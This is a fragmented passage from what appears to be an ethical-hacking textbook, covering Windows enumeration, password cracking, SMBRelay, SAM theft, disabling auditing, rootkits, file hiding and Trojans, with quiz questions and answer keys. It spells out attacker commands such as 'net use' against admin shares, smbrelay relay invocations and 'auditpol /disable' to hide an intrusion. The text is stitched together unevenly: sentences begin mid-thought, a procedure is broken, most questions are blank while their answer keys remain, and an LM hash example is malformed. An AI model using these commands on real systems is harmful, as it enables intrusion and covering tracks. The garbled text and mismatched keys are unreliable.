Another program for scanning IP networks for NetBIOS name information is Nbtscan
(www.unixwiz.net/tools/nbtscan.html). For each host that responds to queries, Nbtscan lists IP
address, NetBIOS computer name, logged-in user name, and MAC address. For example, running
Nbtscan with a local IP and subnet mask returns:
C:\> nbtscan 192.168.1.0/24
192.168.1.3
MTNDEW\WINDEV
SHARING DC
192.168.1.5
MTNDEW\TESTING
192.168.1.9
MTNDEW\WIZ
SHARING U=STEVE
192.168.1.99
MTNDEW\XPDEV
SHARING
NT, created by Evgenii Rudny, that allow the administrator to query the SAM to find out a SID value
for a given account name and vice versa.
User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) from the local or a
remote machine. Sid2user.exe can then be used to retrieve the names of all the user accounts and
more.
These utilities do not exploit a bug but call the functions LookupAccountName and
LookupAccountSid, respectively. These tools can be called against a remote machine without
providing logon credentials except those needed for a null session connection. They rely on the ability
to create a null session, like the earlier (IPC$) hack, in order to work.
For example, running user2sid.exe for the Everyone group, C:\usersid2Everyone, gives you:
S-1-1-0
Number of subauthorities is 1
Domain is
Length of SID in memory is 12 bytes
Type of SID is SidTypeWellKnownGroup
Running the query against the Administrator account C:\usersid2Administrator returns:
S-1-5-21-117609710-688789844-1957994488-500
Number of subauthorities is 5
Domain is THE-02147C896CB
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
So the entire procedure to get user SIDs from NetBIOS in our sample XYZ company is as follows:
1. nslookup www.xyz.com
2. Non-authoritative answer:
3. Name:
4. Address:
www.xyz.com
131.107.2.200
Other Tools
Another NetBIOS exploiting tool is DumpSec (www.somarsoft.com/). DumpSec is a security auditing
program for Microsoft Windows NT/XP/200x. It dumps the permissions (DACLs) and audit settings
(SACLs) for the file system, registry, printers, and shares in a readable format, so that holes in system
security are readily apparent. DumpSec also dumps user, group, and replication information and
reveals shares over a null session with the target computer.
The NetBIOS Auditing Tool (NAT) (www.securityfocus.com/tools/543) is designed to explore the
NetBIOS file-sharing services offered by the target system. It implements a stepwise approach to
gathering information and attempts to obtain file system-level access as though it were a legitimate
local client.
If a NetBIOS session can be established at all via TCP port 139, the target is declared vulnerable.
Once the session is fully set up, the NAT collects more information about the server, including any file
system shares it offers.
SNMP Enumeration
The Simple Network Management Protocol (SNMP) is a network management TCP/IP protocol.
Widely implemented in Ethernet, it defines information transfer among management information
bases (MIBs). SNMP is used by network management systems to monitor network-attached devices
for conditions that warrant administrative attention. It consists of a set of standards for network
management, including an Application Layer protocol, a database schema, and a set of data objects.
SNMP is a pervasive tool. All operating systems have this capability in one form or another, including
network devices such as hubs, switches, and routers. The operation of SNMP is very simple: MIBs
send requests to agents, and the agents reply. These requests and replies refer to variables
accessible to agent software, and the MIBs can send requests to set specific values for certain
variables.
Predefined SNMP events that trigger a notification to the SNMP manager are called traps. After the
manager receives the event, the manager displays it and can choose to take an action based on the
event. For instance, the manager can poll the agent directly or poll other associated device agents to
get a better understanding of the event.
Events that trigger a trap could be a device reboot, a network interface failure, or other abnormal
event.
This simplicity and openness makes SNMP an excellent vehicle for the hacker. Some SNMP
vulnerabilities are:
Insecure defaults. Many devices come configured with PUBLIC as the default SNMP community
string, which makes it easy for an attacker.
No SNMP community name. Some devices dont even have PUBLIC as a community name but
have no name defined at all, making an attack even easier.
Unauthorized write access. Often the Read-Write community is not controlled tightly, giving an
attacker the ability to alter the device.
Remote packet capturing. Some packet-capturing tools can be accessed over a network using
SNMP. An attacker from a remote location could be eavesdropping on network traffic, and
obtaining passwords, user identifications and other sensitive data.
SNMPutil
Enumerating NT users via SNMP is easy using SNMPutil. In an SNMP agent, parameters are
arranged in a tree. SNMP uses an Object Identifier (OID) to specify the exact parameter to set or get
in the tree. An OID consists of the object identifier for an object in an MIB and is a list of numbers
separated by periods.
SNMPUTIL.EXE is a command-line utility (included with the Windows NT 3.51 and 4.0 resource kits)
that allows the querying of MIB information from a network device. With the SNMPUTIL program, you
can access the SNMP OID and get the information you want from a command line.
SNMPutil is run in a command line box from the %systemroot%\system32 directory. Returning a
value from the OID is hit or miss, as different systems use different values. Using 127.0.0.1 as the
target and a community name of PUBLIC, the following list shows some sample SNMPutil command
lines OIDs:
Windows NT:
List all memory and processor OIDs. SNMPutil walk 127.0.0.1 public
.1.3.6.1.4.1.311.1.1.3.1.1.1
List all network interface OIDs. SNMPutil walk 127.0.0.1 public
.1.3.6.1.4.1.311.1.1.3.1.1.3
NetWare Servers:
Trap Receiver and Trap Generator (www.ncomtech.com). Two free Win32 GUIbased
programs let you receive and send custom SNMP traps, forward to other destinations, log them,
and import them into command lines and environment variables.
Also, several Web-based free DNS Interrogation tools are available, such as:
www.zoneedit.com/lookup.html?ad=goto
www.infobear.com/nslookup.shtml
www.network-tools.com
Countermeasures
Its a good idea to be aware of common countermeasures to the vulnerabilities weve just discussed.
One reason is to be aware of how the target may be trying to keep the attacker out. A better reason is
to make sure your systems arent as vulnerable.
There are many countermeasures to the various attack techniques listed above; some are more
effective than others. Well list them in the same order we listed the attacks.
Assessment Questions
Answers to these questions can be found in Appendix A.
1.
Which two modes does Windows employ to utilize protection ring layers?
a. Kernel mode and real mode
b. User mode and kernel mode
c. User mode and protected mode
d. User mode and privileged mode
2.
Which Windows protection layer allows an attacker highest privilege access to the
architecture?
a. Real mode
b. Protected mode
c. Kernel mode
d. User mode
3.
4.
5.
6.
Which choice is not information a hacker could commonly get from exploiting a successful
null session?
a. List of users and groups
b. List of access modes
c. List of machines
d. List of shares
7.
8.
9.
1.
Answer: b
2.
Answer: c
3.
Answer: a
4.
Answer: c
Although security accounts are stored in Active Directory, SAM is retained on Windows 2000
domain controllers for compatibility with those domains and applications that depend on it.
5.
Answer: a
6.
Answer: b
7.
Answer: d
8.
Answer: a
9.
Answer: c
10. Answer: d
Since the administrator account is the account with RID=500, it cannot be obscured successfully.
Therefore, an attacker can find out which account is the administrator account, even if it has been
renamed, by the RID=500.
11. Answer: b
12. Answer: a
13. Answer: b
14. Answer: c
15. Answer: d
16. Answer: a
17. Answer: d
18. Answer: b
19. Answer: d
20. Answer: c
21. Answer: b
22. Answer: a
23. Answer: d
If a hacker obtains a copy of the entire DNS zone for a domain, it may contain a complete listing of
all hosts in that domain. The hacker needs no special tools or access to obtain a complete DNS
zone if the name server is promiscuous and allows anyone to do a zone transfer.
Password Guessing
Guessing passwords is one of the first steps to owing the box. While password guessing seems as
though it might be a fruitless task, its often successful because most users like to employ easy-toremember passwords. Also, if any information about the user is available, like family names or
hobbies, you might have a clue to the password.
The most common passwords are password, root, administrator, admin, operator, demo, test,
webmaster, backup, guest, trial, member, private, beta, [company_name], and [known_username].
After finding that the NetBIOS TCP 139 port is open and accessible, a very effective method of
breaking into Windows is by guessing the password. A good place to start would be to create the IPC$
null session described in Chapter 6 or to attempt to connect to a default enumerated share like
Admin$, C$, or %Systemdrive% and try a username/password combination. Other accounts that are
good candidates for hacking are accounts that have never been used or logged in to or havent had
the password changed in a while. Finally, shared accounts, like TEMP, are ripe targets.
Once an account is identified, the attacker can issue the NET USE command, like this:
net use * \\target_IP\share * /u:name
This will initiate a prompt for a password, such as:
c:\net use * \\10.1.1.13\c$ * /u:rusty
Password Sniffing
Password sniffing is often a preferred tactic to guessing. Its a lot less work to sniff credentials off the
wire as users log in to a server than to guess them. Once sniffed, simply replay the passwords to gain
access. Since most network traffic is unencrypted, sniffing may yield a lot of info; however, it requires
that you have physical or logical access to the wire segment or resource.
L0phtcrack
L0phtcrack LC5 (http://sectools.org/tools2.html) is a password-auditing and recovery package that
includes an SMB packet capture feature. It listens to the local network segment and captures
individual login sessions and can capture most passwords if allowed to run for an extended period of
time.
L0phtcrack was produced by @stake after L0pht merged with @stake in 2000. @stake was acquired
by Symantec in 2004, but Symantec has since stopped selling this tool to new customers citing U.S.
government export regulations and has discontinued support.
KerbCrack
Another useful tool for sniffing passwords is KerbCrack (http://ntsecurity.nu/toolbox/kerbcrack/). If you
found port 88 active during the scanning phase, the target is likely using Kerberos to implement single
sign-on and to provide a secure means for mutual authentication.
Kerberos is a trusted, third-party authentication protocol developed under Project Athena at the
Massachusetts Institute of Technology (MIT). In Greek mythology, Kerberos is a three-headed dog
that guards the entrance to the underworld.
Using symmetric key cryptography, Kerberos authenticates clients to other entities on a network, of
which a client requires services. Centralized servers implement the Kerberos-trusted Key Distribution
Center (KDC), Kerberos Ticket Granting Service (TGS), and Kerberos Authentication Service (AS).
Windows 2000 provides Kerberos implementations.
Because a clients password is used in the initiation of the Kerberos request for the service protocol,
password guessing can be used to impersonate a client. KerbCrack consists of two programs:
kerbsniff and kerbcrack. The sniffer listens to the network on port 88 and captures Windows 2000 and
XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a brute
force attack or a dictionary attack.
Other network sniffers include:
Ethereal (www.ethereal.com/). Ethereal is a popular free network protocol analyzer for Unix and
Windows. It allows users to examine data from a live network or from a captured file on disk. It
can interactively browse the captured data, viewing summary and detail information for each
packet, and has several powerful features, including a rich display filter language and the ability
to view the reconstructed stream of a TCP session and to parse an 802.11 packet.
Snort (www.snort.org). Free lightweight IDS and general-purpose sniffer for various versions of
Linux, Unix, and Windows.
Alternate Means
Two other methods for getting passwords are dumpster diving and shoulder surfing. Dumpster diving
describes the acquisition of information that is discarded by an individual or organization. In many
cases, information found in trash can be very valuable to a hacker, and could lead to password clues.
Post-it notes are rarely shredded and often contain passwords and logons. Other discarded
information may include technical manuals, password lists, telephone numbers, and organization
charts.
Shoulder surfing is the oldest, lowest-tech way to troll for passwords. Its simply standing behind
someone and watching them type their password, then trying to duplicate the keystrokes later. Its a
commonly used way to gain entry to button-coded doors and can still be used if the attacker has
physical access to the target machine, most likely a co-workers. Its obviously not an option for
remote password guessing.
Keystroke Loggers
If all other attempts to sniff out domain privileges fail, then a keystroke logger might be the solution.
Keystroke loggers (or keyloggers) intercept the targets keystrokes and either save them in a file to be
read later, or transmit them to a predetermined destination accessible to the hacker.
There are two types of keystroke loggers: either hardware devices or software programs. They record
every key typed on a computer, sending this information to the person who installed it or saving it to
be read later. While hardware keystroke loggers require physical access to a system, they are not
detectable by anti-spyware software.
The software versions may be delivered by Trojan horse email attachments or installed directly to the
PC. The hardware version must be physically installed on the target machine, usually without the
users knowledge. Although keyloggers are sometimes used in the payloads of viruses, they are more
commonly delivered by a Trojan-horse program or remote administration Trojan (RAT).
Since keylogging programs record every keystroke typed in via the keyboard, they can capture a wide
variety of confidential information, including passwords, credit card numbers, private email
correspondence, names, addresses, and phone numbers. Once installed on the target machine,
either directly by the user, or through stealthier means, the keylogger program runs continually in the
background. After the keystrokes are logged, they can be hidden in the machine for later retrieval or
transmitted to the attacker via the Internet. For example, sometimes these logging files are emailed to
the person who planted the logging software. On PCs accessed by the public in areas such as copy
shops, cyber cafes, and university computer labs, the spy simply accesses the log file from the
compromised machine at a later date.
The attacker then examines the reports for passwords or for information that can be used to
compromise the system or to engineer an attack. A keylogger may reveal the contents of email
composed by the victim.
Some rare keyloggers include routines that secretly turn on video or audio recorders, and transmit
what they capture over an Internet connection. Other products such as Spector and PCSpy capture
screens rather than keystrokes. Most criminal keyloggers pay attention to keystrokes, hoping to steal
bank account numbers or other financial data.
As an example, look at everything one commercial software keylogger, ISpyNow, claims it can do:
Logs websites accessed: Logs all websites visited
Monitors keystrokes: Records all keystrokes, including hidden system keys
Logs windows: Records information on which windows have been opened
Logs applications: Logs every application executed
Logs IM chats: Records both ends of AIM/AOL/MSN/ICQ instant messaging in real time
Copies clipboard activity: Records all text and images cut and pasted to the clipboard
Hardware Keyloggers
Some hardware keystroke loggers consist of a small AA battery-sized plug that connects between the
victims keyboard and computer. The device collects each keystroke as it is typed and saves it as a
text file on its own tiny hard drive. Later, the keystroke logger owner returns, removes the device, and
downloads and reads the keystroke information. These devices have memory capacities between
8KB and 2MB, which, according to manufacturers claims, is enough memory to capture a years
worth of typing.
Manufacturers now offer hardware keyloggers that are complete keyboards with hardware keyloggers
built-in. For example, KeyGhost, a New Zealand company, offers a keyboard with the logging
hardware built into the case. They claim to have a variety of bugged keyboards ready-made to match
many brands of computers. If your existing keyboard is unique, KeyGhost will modify it and return it
with the keylogger hardware hidden inside.
Software Keyloggers
A software keystroke logger program does not require physical access to the users computer. It can
be installed intentionally by someone who wants to monitor activity on a particular computer or
downloaded unwittingly as spyware and executed as part of a rootkit or a Remote Access Trojan
(RAT).
The software keylogger normally consists of two files: a DLL that does all the recording and an EXE
that installs the DLL and sets the activation trigger. The two files must be present in the same
directory. Then the keystroke logger program records each keystroke the user types and uploads the
information over the Internet periodically to the installer.
Software keyloggers are often delivered via a Trojan payload through email. This area of malicious
code is growing exponentially as well-financed criminal groups find holes in financial networks. One
advantage software keyloggers have over hardware keyloggers is that the program can often remain
undetected and be continually initiated every time the computer is turned on. Also, software
keyloggers are cheaper than hardware keyloggers, with many free versions on the Internet.
Many software keystroke loggers are integrated with other surreptitious recording software, such as
screen capture software, remote control software, or audio and video recorders.
Keylogging Tools
There are a lot of software keyloggers out there, several of them are free. Although not technically
keyloggers, products like Spector (www.spector.com) automatically take hundreds of screen shots
every hour. Spector works by taking a snapshot of whatever is on the targets computer screen and
stores in a hidden location on the targets hard drive, to be retrieved later.
Another tool, eBlaster (www.eblaster.com), records the targets computer activity such as email, chat,
instant messages, websites visited, and keystrokes typed, and then sends this recorded information to
the attackers email address. It sends duplicate copies of email to the attacker, within seconds of the
targets sending or receiving an email.
Other software keyloggers include:
ISpyNow. www.ispynow.com
KeyCaptor. www.keylogger-software.com
Redirecting SMB
Eavesdropping on passwords becomes much easier if the attacker can trick the victim to attempt
Windows authentication of the attackers choice and redirect the SMB logon to the attacker.
Simply stated, this is done by sending an email message to the victim containing an embedded
hyperlink to a fraudulent SMB server. When the hyperlink is clicked, the user unwittingly sends his or
her credentials over the network.
A tool that can implement this kind of password trap is SMBRelay (http://seclists.org/pentest/2002/Jul/0006.html). SMBRelay is a server that can capture usernames and password hashes
from incoming SMB traffic. Another version, SMBRelay2, works at the NetBIOS level across any
protocol to which NetBIOS is bound (such as NetBEUI or TCP/IP). It differs from SMBRelay in that it
uses NetBIOS names rather than IP addresses. Like SMBRelay, SMBRelay2 also supports man-inthe-middle attacks to a third host.
To use SMBRelay:
1. Disable NetBIOS over TCP/IP, and block ports 139 and 445.
2. Start the SMBRelay server, and listen for SMB packets:
3. c:\>smbrelay /e
c:\>smbrelay /IL 2 /IR 2
An attacker can then access the client machine simply by connecting to it via a relay address using
c:\> net use * \\<capture _ip>\c$.
To execute a SMBRelay man-in-the-middle attack, the attacker builds a server at address
192.168.234.251, a relay address of 192.168.234.252 using /R, and a target server address of
192.168.234.34 with /T.
Then he or she executes: c:\> smbrelay /IL 2 /IR /R 192.168.234.252 /T
192.168.234.34. When a victim client connects to the fraudulent server thinking it is talking to the
intended server, the attackers server intercepts the call, hashes the password, and passes the
connection to the target server.
Privilege Escalation
Very often, the attacker will not be able to snag the Administrator account and password, and will have
to settle for access to the network using a non-admin user account, like Guest. This means that the
next step the attacker will probably take is to try to elevate his or her network privilege to that of an
administrator, to gain full control of the system. This is called privilege escalation.
This is not easy, as privilege escalation tools must usually be executed physically from a target
machine on the network, although some of the tools listed in this section allow remote privilege
escalation. Most often, these tools require the hacker to have access to that machine or server.
One big problem with privilege escalation tools is that the operating systems are continually patched
to prevent these tools from working. This means the attacker will need to know the OS of the system
on which he or she is trying to install the tool, and he or she will need to have a variety of tools to
match to the OS.
For example, GetAdmin.exe (www.nmrc.org/pub/faq/hackfaq/hackfaq-15.html) is a small program
that adds a user to the local administrators group. It uses low-level NT kernel routine to set an
NTglobalflag attribute, allowing access to any running process. To use GetAdmin, the attacker
must logon to the server console to execute the program, as its run from the command line or from a
browser and works only with NT 4.0 Service Pack 3.
Another NT tool, hk.exe (http://seclists.org/pen-test/2001/Mar/0209.html), exposes a Local
Procedure Call flaw in NT, allowing a non-admin user to be escalated to the administrators group.
Hk.exe works on IIS 5.0.
Table 7-1 shows some privilege escalation tools and the operating systems on which theyll work.
OS
pipeupadmin (www.bitenova.nl/tt/dgap4)
Windows 2000
billybastard
(www.packetstormsecurity.org/filedesc/billybastard.c.html)
getad (http://packet-x.net/tools_exploits/getad)
Windows XP
Password Cracking
Passwords are generally stored and transmitted in an encrypted form called a hash. When a user logs
on to a system and enters a password, a hash is generated and compared to a stored hash. If the
entered and the stored hashes match, the user is authenticated.
Prior to Windows NT 4.0 SP4, Windows NT supported two kinds of challenge/response
authentication, LanManager (LM) challenge/response, and Windows NT challenge/response (also
known as NTLM challenge/response). Versions of Windows prior to Windows 2000 use LM password
hashes, which have several weaknesses:
LM is not case sensitive: All alphabetic characters are converted to uppercase. This effectively
reduces the number of different combinations a password cracker has to try.
All LM passwords are stored as two 7-character hashes. Passwords that are exactly 14
characters long will be split into two 7-character hashes. Passwords with fewer than 14
characters will be padded up to 14 characters.
Owing to the mathematics of password cracking, two 7-character hashes are significantly easier to
crack than one 14-character hash. To see why this is, lets step through an example. Lets use the
password 123456qwerty:
1. When this password is encrypted with LM algorithm, it is first converted to all uppercase:
123456QWERTY.
2. The password is padded with null (blank) characters to make it 14-character length:
123456QWERTY__.
3. Before encrypting this password, the 14-character string is split into halves: 123456Q and
WERTY__.
4. Each string is individually encrypted, and the results are concatenated:
123456Q = 6BF11E04AFAB197F
WERTY__ = F1E9FFDCC75575B15
5. The resulting hash is 6BF11E04AFAB197FF1E9FFDCC75575B15.
The first half of the hash contains alphanumeric characters and could take L0phtcrack several
hours to crack, but the second half will take only about 60 seconds.
In contrast, NTLM authentication takes advantage of all 14 characters in the password and allows
lowercase letters. Thus, even though an attacker eavesdropping on the Windows NT authentication
protocol can attack it in the same way as the LM authentication protocol, it will take far longer for the
attack to succeed. If the password is strong enough, it will take a single 200 MHz Pentium Pro
computer an average of 2,200 years to find the keys derived from it and 5,500 years to find the
password itself (or 2.2 years and 5.5 years with 1,000 such computers and so forth).
The LM hash has since been replaced by WinNT Challenge/Response NTLMv2. For NTLMv2, the key
space for password-derived keys is 128 bits. This makes a brute force search infeasible, even with
hardware accelerators, if the password is strong enough.
If both client and server are using SP4, the enhanced NTLMv2 session security is negotiated. It
provides separate keys for message integrity and confidentiality and client input into the challenge to
prevent chosen plain text attacks and makes use of the HMAC-MD5 algorithm for message integrity
checking.
In Windows 2000 Service Pack 2 and in later versions of Windows, a setting is available that lets a
user prevent Windows from storing a LAN Manager hash of the password.
Dictionary Attack
The fastest method for generating hashes is a dictionary attack, which uses all words in a dictionary
or text file. There are many dictionaries available on the Internet that cover most major and minor
languages, names, popular television shows, and so on. Any dictionary word is a weak password and
can be cracked quickly.
Most cracking tools will include their own dictionaries with the utility or suggest links to find
dictionaries to build your own. A specific example of this approach is the LC5 password auditing and
recovery tool, which performs the encrypted file comparison against a dictionary of over 250,000
possible passwords.
Hybrid Attack
Another method of cracking is called a hybrid attack, which builds on the dictionary method by adding
numeric and symbolic characters to dictionary words.
Depending on the password cracker being used, this type of attack will try a number of variations. The
attack tries common substitutes of characters and numbers for letters (e.g., p@ssword and h4ckme).
Some will also try adding characters and numbers to the beginning and end of dictionary words (for
example, password99, password$%, and so on).
Rainbow Attack
A new password attack method is called the rainbow crack technique. It trades off the time-consuming
process of creating all possible password hashes by building a table of hashes in advance of the
actual crack. After this process is finished, the table, called a rainbow table, is used to crack the
password, which will then normally only take a few seconds.
Stealing SAM
The SAM file in Windows NT/2000 contains the usernames and encrypted passwords in their hash
form; therefore accessing the SAM will give the attacker potential access to all of the passwords. The
SAM file can be obtained from the %systemroot%\system32\config directory, but the file is
locked when the OS is running, so the attacker will need to boot the server to an alternate OS.
This can be done with NTFSDOS (www.sysinternals.com), which will mount any NTFS partition as a
logical drive. LinNT.zip (www.nttoolbox.com/public/tools/LinNT.zip) is another good utility. It makes
a Linux boot disk that allows the user to reset the administrator password. The site is no longer up,
and copies of LinNT.zip are not that easy to find.
Another way to get the SAM is to copy from either the servers repair directory or the physical ERdisk
itself. Whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in
%systemroot%\repair. Expand this file using c:\>expand sam._sam.
Starting with WinNT SP3, Microsoft added a second layer of 128-bit encryption to the password hash
called SYSKEY. Newer versions of Windows place a backup copy in
C:\winnt\repair\regnabk\sam and employ SYSKEY to make the cracking harder.
Cracking Tools
Once the hashes have been extracted from the SAM, an automated password cracker like
L0phtCrack LC5 can crack them. Mentioned earlier, the password sniffing program L0phtCrack is also
one of the best tools to crack Windows passwords from hashes.
L0phtCrack uses numerous methods for generating password guesses, including dictionary, hybrid,
and brute force. LC5 was discontinued by Symantec in 2006, but you can still find the LC5 installer
(http://download.insecure.org/stf/lc5-setup.exe) on the Internet.
For obtaining hashes, L0phtCrack contains features that allow it to capture passwords as they
traverse the network, copy them out of the Windows Registry, and retrieve them from Windows
emergency repair disks.
When hashes are obtained, L0phtCrack first performs a dictionary attack. The dictionary used by
L0phtCrack is selected by the user; the included dictionary may be used, although more
comprehensive dictionaries are available on the Internet.
L0phtCrack hashes each word in the list and compares that hash to the hashes to be cracked. If the
compared hashes match, L0phtCrack has found the password. After L0phtCrack completes the
dictionary attack, it iterates through the word list again using a hybrid attack.
Finally, L0phtCrack resorts to a brute force attack to crack any remaining hashes, trying every
possible combination of characters in a set. The set of characters used by L0phtCrack in a brute force
attack can be controlled by the user. The larger the set selected, the longer the crack will take.
Another popular password cracker is John the Ripper (www.openwall.com/john/). John the Ripper is a
free fast password cracker currently available for Unix, DOS, Win32, and BeOS. Its primary purpose
is to detect weak Unix passwords, but a number of other hash types are supported as well. One
problem with John the Ripper is that it cant differentiate between uppercase and lowercase
passwords.
Nwpcrack (ftp.cerias.purdue.edu/pub/tools/novell/) is a free password cracking utility for Novell
Netware. IMP (www.wastelands.gen.nz) is another free NetWare password cracking utility, this time
with a GUI. Some other common password cracking tools are:
Brutus. Brutus (www.hoobie.net/brutus/) is a password cracking tool that can perform both
dictionary attacks and brute force attacks where passwords are randomly generated from a given
character. Brutus can crack the multiple authentication types, HTTP (Basic authentication, HTML
Form/CGI), POP3, FTP, SMB, and Telnet.
Two cracking tools that use Rainbow Tables are Ophcrack (http://ophcrack.sourceforge.net) and
RainbowCrack (www.antsight.com/zsl/rainbowcrack/).
Covering Tracks
Even though the attacker has compromised the system, he or she isnt finished. He/she must disable
logging, clear log files, eliminate evidence, plant additional tools, and cover his or her tracks.
Once a hacker has successfully gained Administrator access to a system, he or she will try to remove
signs of his or her presence. The evidence of having been there and done the damage must be
eliminated. When all incriminating evidence has been removed from the target, he or she will install
several back doors to permit easy access at another time.
Disabling Auditing
The first thing a hacker will do after gaining Administrator privileges is disable auditing. The WinNT
Resource Kits auditpol.exe tool (http://support.microsoft.com/kb/921469) can disable auditing by
using the command line:
c:\audipol \\10.1.1.13 /disable
(0) Audit Disabled
After compromising the system, the last thing a hacker will do is turn on auditing again using auditpol:
c:\audipol \\10.1.1.13 /enable
Auditing enabled successfully.
Planting Rootkits
Before the attacker leaves the system, he or she wants to make sure he or she can have access to
the box later. One way to do this and cover his or her tracks at the same time is to install a rootkit on
the compromised system.
A rootkit is a collection of software tools that a cracker uses to obtain administrator-level access to a
computer or computer network. The intruder installs a rootkit on a computer after first obtaining userlevel access, either by exploiting a known vulnerability or cracking a password. The rootkit then
collects user IDs and passwords to other machines on the network, thus giving the hacker root or
privileged access.
The rootkit NTrootkit consists of utilities that also monitor traffic and keystrokes, create a backdoor
into the system for the hackers use, alter log files, attack other machines on the network, and alter
existing system tools to circumvent detection.
NTrootkit can also:
Hide processes (that is, keep them from being listed)
Hide files
Hide registry entries
Intercept keystrokes typed at the system console
Issue a debug interrupt, causing a blue screen of death
Redirect EXE files
File Hiding
Attackers use different methods to hide files on compromised servers. There are two ways of hiding
files in Windows NT and Windows 2000:
Use the attrib command: attrib +h [file/directory]
Use NTFS Alternate Data Streaming (ADS)
The NTFS file system used by Windows NT, 2000, and XP has a feature called Alternate Data
Streams (ADS) that was originally developed to provide compatibility with non-Windows file systems,
like Macintosh Hierarchical File System (HFS); but ADS can also allow data to be stored in hidden
files that are linked to a regular visible file. These streams are not limited in size, and there can be
more than one stream linked to the visible file. This allows an attacker to hide his or her tools on the
compromised system and retrieve them later.
To see how creating an alternate data stream works:
1. From the command line, type Notepad temp.txt.
2. Put some data in the test.txt file; save the file, and close Notepad.
3. From the command line, type dir temp.txt, and note the file size.
4. Go to the command line, and type Notepad temp.txt:hidden.txt.
5. Type some text into Notepad; save the file, and close it.
6. Check the file size again, and notice that it hasnt changed.
7. If you open temp.txt, you see your original data and nothing else.
8. If you use the type command on the filename from the command line, you still get the original
data.
9. If you go to the command line and type type temp.txt:hidden.txt, you get an error.
Some third-party tools are available to create Alternate Data Streams. The ADS creation and
detection tool makestrm.exe moves the physical contents of a file to its stream. The utility ads_cat
from Packet Storm is a utility for writing ADS that includes ads_extract, ads_cp, and ads_rm,
utilities to read, copy, and remove data from NTFS alternate file streams.
Countermeasures
Its important to know what countermeasures exist for the tools weve listed, because you dont want
your system to be vulnerable. Heres a quick list of some countermeasures to take to prevent and
remediate the attacks already discussed.
Password guessing and cracking countermeasures include the following:
Enforce 712 character alpha-numeric, upper- and lowercase passwords.
Set the password change policy to 30 days.
Physically isolate and protect the server.
Use the SYSKEY utility to store hashes on disk.
Monitor the server logs for brute force attacks on user accounts.
Block access to TCP and UDP ports 135139.
Disable bindings to the Wins client on any adapter.
Log failed logon attempts in Event Viewer.
There are several steps to prevent or find Alternate Data Streams on your system. To remove ADS
manually, copy the front file to a FAT partition; then, copy it back to NTFS. Streams are lost when the
file is moved to FAT Partition.
Employ file integrity checkers to look for ADS and rootkits. Some tools include:
Tripwire (www.tripwiresecurity.com/). This monitors file changes, verifies integrity, and notifies
the administrator of any violations of data on network hosts.
Assessment Questions
Answers to these questions can be found in Appendix A.
1.
Which choice below is not an activity during the System Hacking Phase?
a. Crack password hashes
b. Look up the URL in ARIN
c. Erase any traces of the hack
d. Escalate the level of permission
2.
3.
What is a good clue that the target system is using NetBIOS naming?
a. TCP 139 port is open and accessible
b. TCP 193 port is open and accessible
c. UDP 193 port is open and accessible
d. Accounts that have never been used
4.
What is the proper NET USE syntax to prompt NetBIOS to ask to a password?
a. net use /u:name * \\target_IP\share *
b. net use * \\target_IP\share * /u:name
c. net use * \\share\target_IP /u:name *
d. use net /u:name * \\target_IP\share *
5.
6.
What is a good clue that the target system is using Kerberos authentication?
a. Port 99 was found active during the scanning phase
b. Port 88 was found active during the scanning phase
c. A lockout policy was discovered
d. Port 98 was found active during the scanning phase
7.
8.
What can you infer by finding activity on port 445 during a scan?
a. SMB services are active, and the system is using Win2K or greater.
b. NetBIOS naming is being used on the system.
c. Kerberos authentication has been employed.
d. There is no port 445.
9.
1.
Answer: b
2.
Answer: c
3.
Answer: a
4.
Answer: b
5.
Answer: d
6.
Answer: b
7.
Answer: d
8.
Answer: a
9.
Answer: b
10. Answer: d
11. Answer: b
12. Answer: c
13. Answer: d
14. Answer: a
15. Answer: a
16. Answer: d
17. Answer: c
18. Answer: c
19. Answer: c
20. Answer: a
Trojan Types
There are several types of Trojans; each behaves differently and produces differing results from the
others. Depending upon the type of Trojan, an attacker can use them to stage various types of
exploits.
Trojans can be:
Remote access Trojans (RATS)
Keystroke loggers or password sending Trojans
Software detection killers
Purely destructive or service denying Trojans
FTP Trojans
Some Trojans are programmed to open specific ports to allow access for exploitation. When a Trojan
is installed on a system, it often opens a high-numbered port. The open port can be scanned and
located, enabling an attacker to compromise the system.
After the server file has been installed on a victims machine, often accompanied by changes to the
Registry to ensure that the Trojan is reactivated whenever the machine is restarted, the program
opens a port so that the hacker can connect. The hacker can then utilize the Trojan via this
connection to issue commands to the victims computer. Some RATs even provide a message system
that notifies the hacker every time a victim logs on to the Internet.
Most RATs and backdoor Trojans use common specific ports. Table 8-1 shows some of these ports.
Table 8-1: Common Remote Access Port Numbers
Open table as spreadsheet
NAME
DEFAULT PORT
RELATED PROTOCOL
Back Orifice
31337
UDP
BO2K
54320/54321
TCP/UDP
Beast
6666
TCP
Citrix ICA
1494
TCP/UDP
Donald Dick
23476/23477
TCP
Masters Paradise
40421-40426
TCP
49608/49609
TCP
NetBus
12345
TCP
Netcat
Various
TCP
pcAnywhere
5631/5632/65301
TCP
Reachout
43188
TCP
Remotely anywhere
2000/2001
TCP
Remote
135-139
TCP/UDP
Timbuktu
407
TCP/UDP
VNC
5800/5801
TCP/UDP
Combined attack vectors are often used so that if the message doesnt carry the malware, the
attachment does. Email attachments are still the most common way to attack a PC, but the email
messages themselves are now used as attack vectors, with the malware embedded in the email
message. This means that just reading or previewing the message can launch an attack.
Email message attacks rely on malicious code embedded in messages in HTML format. Evil HTML
messages in conjunction with trusting email clients can easily infiltrate computers, installing Trojan
horses and opening backdoors for further invasion. One nasty trick adopted from spammers is to
place an opt-out link at the bottom of spam. When the link is clicked, a Trojan is installed on the PC.
A good example of an email Trojan horse is Sepuc. Victims normally have no idea that theyre being
spied on. The email has no subject line and no visible text in the body of the message. If the user
opens the message, a small amount of malicious code hidden in the email attempts to exploit a known
vulnerability in Internet Explorer to force a download from a remote machine. If it succeeds, this file
downloads several other pieces of code and eventually installs a Trojan capable of harvesting data
from the PC and sending it to a remote machine.
Deception is a common vector for Trojans. Deception is aimed at a gullible user as the vulnerable
entry point. Most deception schemes require the unwitting cooperation of the computers operator to
succeed. This section illustrates some of the common forms of attacks by deception.
Counterfeit websites use deception as the attack vector. They are intended to look genuine but are
used to plant malware. Often, theyre used in conjunction with spam and pop-up pages to install
spyware, adware, hijackers, dialers, Trojans, or other malware. It can all happen as quickly as the
page loads or when a link is clicked.
Common Trojan Vectors for Malicious Code
HTML email and web pages can deliver malicious code in a variety of ways. Here are the various
means:
ActiveX controls. Browser security settings that prevent running unsigned or unverified ActiveX
